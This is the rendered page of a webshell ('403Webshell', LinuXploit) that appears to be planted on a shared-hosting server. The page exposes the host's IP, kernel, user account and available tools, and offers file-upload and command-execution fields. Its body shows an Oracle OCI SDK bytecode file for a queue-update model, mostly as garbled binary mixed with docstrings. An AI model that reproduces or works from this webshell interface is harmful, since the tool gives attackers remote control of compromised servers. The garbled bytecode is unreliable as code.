403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib/python3.9/site-packages/oci/queue/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.9/site-packages/oci/queue/models/__pycache__/update_queue_details.cpython-39.pyc
a

���f
/�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@seZdZdZdd�Zedd��Zejdd��Zedd��Zejd	d��Zed
d��Z	e	jdd��Z	ed
d��Z
e
jdd��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Z
e
jdd��Z
edd��Zejdd��Zdd�Zdd�Zd d!�Zd"S)#�UpdateQueueDetailsz(
    The information to be updated.
    c	Ksdddddddddd�|_dddd	d
ddd
d�|_d|_d|_d|_d|_d|_d|_d|_d|_	dS)aa
        Initializes a new UpdateQueueDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param display_name:
            The value to assign to the display_name property of this UpdateQueueDetails.
        :type display_name: str

        :param visibility_in_seconds:
            The value to assign to the visibility_in_seconds property of this UpdateQueueDetails.
        :type visibility_in_seconds: int

        :param timeout_in_seconds:
            The value to assign to the timeout_in_seconds property of this UpdateQueueDetails.
        :type timeout_in_seconds: int

        :param channel_consumption_limit:
            The value to assign to the channel_consumption_limit property of this UpdateQueueDetails.
        :type channel_consumption_limit: int

        :param dead_letter_queue_delivery_count:
            The value to assign to the dead_letter_queue_delivery_count property of this UpdateQueueDetails.
        :type dead_letter_queue_delivery_count: int

        :param custom_encryption_key_id:
            The value to assign to the custom_encryption_key_id property of this UpdateQueueDetails.
        :type custom_encryption_key_id: str

        :param freeform_tags:
            The value to assign to the freeform_tags property of this UpdateQueueDetails.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this UpdateQueueDetails.
        :type defined_tags: dict(str, dict(str, object))

        �str�intzdict(str, str)zdict(str, dict(str, object)))�display_name�visibility_in_seconds�timeout_in_seconds�channel_consumption_limit� dead_letter_queue_delivery_count�custom_encryption_key_id�
freeform_tags�defined_tagsZdisplayNameZvisibilityInSecondsZtimeoutInSecondsZchannelConsumptionLimitZdeadLetterQueueDeliveryCountZcustomEncryptionKeyIdZfreeformTagsZdefinedTagsN)
Z
swagger_typesZ
attribute_map�
_display_name�_visibility_in_seconds�_timeout_in_seconds�_channel_consumption_limit�!_dead_letter_queue_delivery_count�_custom_encryption_key_id�_freeform_tags�
_defined_tags)�self�kwargs�r�I/usr/lib/python3.9/site-packages/oci/queue/models/update_queue_details.py�__init__s4'��zUpdateQueueDetails.__init__cCs|jS)a
        Gets the display_name of this UpdateQueueDetails.
        The `OCID`__ of the queue.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm


        :return: The display_name of this UpdateQueueDetails.
        :rtype: str
        �r�rrrrr	WszUpdateQueueDetails.display_namecCs
||_dS)a
        Sets the display_name of this UpdateQueueDetails.
        The `OCID`__ of the queue.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm


        :param display_name: The display_name of this UpdateQueueDetails.
        :type: str
        Nr)rr	rrrr	escCs|jS)a
        Gets the visibility_in_seconds of this UpdateQueueDetails.
        The default visibility timeout of the messages consumed from the queue, in seconds.


        :return: The visibility_in_seconds of this UpdateQueueDetails.
        :rtype: int
        �rrrrrr
ss
z(UpdateQueueDetails.visibility_in_secondscCs
||_dS)a
        Sets the visibility_in_seconds of this UpdateQueueDetails.
        The default visibility timeout of the messages consumed from the queue, in seconds.


        :param visibility_in_seconds: The visibility_in_seconds of this UpdateQueueDetails.
        :type: int
        Nr )rr
rrrr
s
cCs|jS)z�
        Gets the timeout_in_seconds of this UpdateQueueDetails.
        The default polling timeout of the messages in the queue, in seconds.


        :return: The timeout_in_seconds of this UpdateQueueDetails.
        :rtype: int
        �rrrrrr�s
z%UpdateQueueDetails.timeout_in_secondscCs
||_dS)a
        Sets the timeout_in_seconds of this UpdateQueueDetails.
        The default polling timeout of the messages in the queue, in seconds.


        :param timeout_in_seconds: The timeout_in_seconds of this UpdateQueueDetails.
        :type: int
        Nr!)rrrrrr�s
cCs|jS)a)
        Gets the channel_consumption_limit of this UpdateQueueDetails.
        The percentage of allocated queue resources that can be consumed by a single channel. For example, if a queue has a storage limit of 2Gb, and a single channel consumption limit is 0.1 (10%), that means data size of a single channel  can't exceed 200Mb. Consumption limit of 100% (default) means that a single channel can consume up-to all allocated queue's resources.


        :return: The channel_consumption_limit of this UpdateQueueDetails.
        :rtype: int
        �rrrrrr�s
z,UpdateQueueDetails.channel_consumption_limitcCs
||_dS)aA
        Sets the channel_consumption_limit of this UpdateQueueDetails.
        The percentage of allocated queue resources that can be consumed by a single channel. For example, if a queue has a storage limit of 2Gb, and a single channel consumption limit is 0.1 (10%), that means data size of a single channel  can't exceed 200Mb. Consumption limit of 100% (default) means that a single channel can consume up-to all allocated queue's resources.


        :param channel_consumption_limit: The channel_consumption_limit of this UpdateQueueDetails.
        :type: int
        Nr")rrrrrr�s
cCs|jS)a�
        Gets the dead_letter_queue_delivery_count of this UpdateQueueDetails.
        The number of times a message can be delivered to a consumer before being moved to the dead letter queue.
        A value of 0 indicates that the DLQ is not used.
        Changing that value to a lower threshold does not retroactively move in-flight messages in the dead letter queue.


        :return: The dead_letter_queue_delivery_count of this UpdateQueueDetails.
        :rtype: int
        �rrrrrr
�sz3UpdateQueueDetails.dead_letter_queue_delivery_countcCs
||_dS)a
        Sets the dead_letter_queue_delivery_count of this UpdateQueueDetails.
        The number of times a message can be delivered to a consumer before being moved to the dead letter queue.
        A value of 0 indicates that the DLQ is not used.
        Changing that value to a lower threshold does not retroactively move in-flight messages in the dead letter queue.


        :param dead_letter_queue_delivery_count: The dead_letter_queue_delivery_count of this UpdateQueueDetails.
        :type: int
        Nr#)rr
rrrr
�scCs|jS)a�
        Gets the custom_encryption_key_id of this UpdateQueueDetails.
        The `OCID`__ of the custom encryption key to be used to encrypt messages content. A string with a length of 0 means the custom key should be removed from queue.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm


        :return: The custom_encryption_key_id of this UpdateQueueDetails.
        :rtype: str
        �rrrrrr�sz+UpdateQueueDetails.custom_encryption_key_idcCs
||_dS)a�
        Sets the custom_encryption_key_id of this UpdateQueueDetails.
        The `OCID`__ of the custom encryption key to be used to encrypt messages content. A string with a length of 0 means the custom key should be removed from queue.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm


        :param custom_encryption_key_id: The custom_encryption_key_id of this UpdateQueueDetails.
        :type: str
        Nr$)rrrrrr�scCs|jS)aK
        Gets the freeform_tags of this UpdateQueueDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{"bar-key": "value"}`


        :return: The freeform_tags of this UpdateQueueDetails.
        :rtype: dict(str, str)
        �rrrrrr�sz UpdateQueueDetails.freeform_tagscCs
||_dS)aW
        Sets the freeform_tags of this UpdateQueueDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{"bar-key": "value"}`


        :param freeform_tags: The freeform_tags of this UpdateQueueDetails.
        :type: dict(str, str)
        Nr%)rrrrrrscCs|jS)aE
        Gets the defined_tags of this UpdateQueueDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        Example: `{"foo-namespace": {"bar-key": "value"}}`


        :return: The defined_tags of this UpdateQueueDetails.
        :rtype: dict(str, dict(str, object))
        �rrrrrr
szUpdateQueueDetails.defined_tagscCs
||_dS)aP
        Sets the defined_tags of this UpdateQueueDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        Example: `{"foo-namespace": {"bar-key": "value"}}`


        :param defined_tags: The defined_tags of this UpdateQueueDetails.
        :type: dict(str, dict(str, object))
        Nr&)rrrrrrscCst|�S�N)rrrrr�__repr__'szUpdateQueueDetails.__repr__cCs|durdS|j|jkS)NF)�__dict__�r�otherrrr�__eq__*szUpdateQueueDetails.__eq__cCs
||kSr'rr*rrr�__ne__0szUpdateQueueDetails.__ne__N)�__name__�
__module__�__qualname__�__doc__r�propertyr	�setterr
rrr
rrrr(r,r-rrrrrsJE





















rN)Zoci.utilrrrZoci.decoratorsr�objectrrrrr�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit